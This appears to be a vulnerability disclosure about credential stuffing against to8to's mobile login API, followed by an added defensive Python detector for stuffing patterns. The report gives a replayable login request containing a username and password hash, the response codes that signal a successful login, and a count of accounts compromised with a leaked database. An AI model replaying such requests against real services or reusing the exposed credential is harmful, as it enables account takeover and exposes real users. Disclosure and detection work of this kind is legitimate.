Credential stuffing against a login interface of Tuba Rabbit (to8to) home-renovation network discloses user login credentials (account credentials attached)
The mobile login interface has no defense against credential stuffing: no restrictions of any kind are imposed on calls to the logon interface. In testing, we found that replaying a leaked credential database against it matches a large number of valid login accounts.
POST http://mobileapi.to8to.com/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; HUAWEI C199 Build/HuaweiC199; TO8TOAPP)
Host: mobileapi.to8to.com
Connection: close
Accept-Encoding: gzip
Content-Length: 168

username=fanzhenkun&model=user&action=owner&appversion=2.5.0&systemversion=19&password=dac80695ee5f7a6c915a84916f16d2f0&channel=%E8%B1%8C%E8%B1%86%E8%8D%9A&version=2.5&
695 / 672 mark a successfully logged-in user. Running the CSDN leaked database for 10 minutes yielded 97 successful account logins.
Solution:
Credential stuffing defense reference: http://www.bkjia.com/Article/201408/327112.html
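As an added illustration of the defense (not code from the report or from to8to): a detector that flags a source making many login attempts across many different usernames inside a short window, run over constructed log lines in an assumed format; thresholds are illustrative.

```python
# Added example (not from the report). Assumed log line format per attempt: "<ISO time> <source IP> login user=<u> result=<ok|fail>".
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source tries 11 usernames in 6 seconds; another retries its own account once.
SAMPLE_LOG = """\
2015-03-01T10:00:00 203.0.113.5 login user=alice result=fail
2015-03-01T10:00:01 203.0.113.5 login user=bob result=fail
2015-03-01T10:00:01 203.0.113.5 login user=carol result=ok
2015-03-01T10:00:02 203.0.113.5 login user=dave result=fail
2015-03-01T10:00:02 203.0.113.5 login user=erin result=fail
2015-03-01T10:00:03 203.0.113.5 login user=frank result=fail
2015-03-01T10:00:03 203.0.113.5 login user=grace result=fail
2015-03-01T10:00:04 203.0.113.5 login user=heidi result=fail
2015-03-01T10:00:05 203.0.113.5 login user=ivan result=fail
2015-03-01T10:00:05 203.0.113.5 login user=judy result=fail
2015-03-01T10:00:06 203.0.113.5 login user=mallory result=ok
2015-03-01T10:05:00 198.51.100.7 login user=peggy result=fail
2015-03-01T10:05:30 198.51.100.7 login user=peggy result=ok
"""

WINDOW = timedelta(minutes=1)  # sliding window per source IP (illustrative)
MAX_ATTEMPTS = 10              # attempts tolerated per source per window
MIN_DISTINCT_USERS = 5         # many usernames from one source = stuffing, not a typo

def parse(line):
    ts, ip, _, user, result = line.split()
    return datetime.fromisoformat(ts), ip, user[5:], result[7:]

def find_stuffing_sources(log):
    """Return {ip: (attempts, distinct_users, successes)} for every source
    that exceeds MAX_ATTEMPTS across MIN_DISTINCT_USERS within one WINDOW.
    A flagged source should be throttled (HTTP 429) or sent to a CAPTCHA."""
    by_ip = defaultdict(list)
    for line in log.strip().splitlines():
        ts, ip, user, result = parse(line)
        by_ip[ip].append((ts, user, result))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > WINDOW:
                start += 1
            window = events[start:end + 1]
            users = {u for _, u, _ in window}
            if len(window) > MAX_ATTEMPTS and len(users) >= MIN_DISTINCT_USERS:
                flagged[ip] = (len(window), len(users), sum(r == "ok" for _, _, r in window))
    return flagged
```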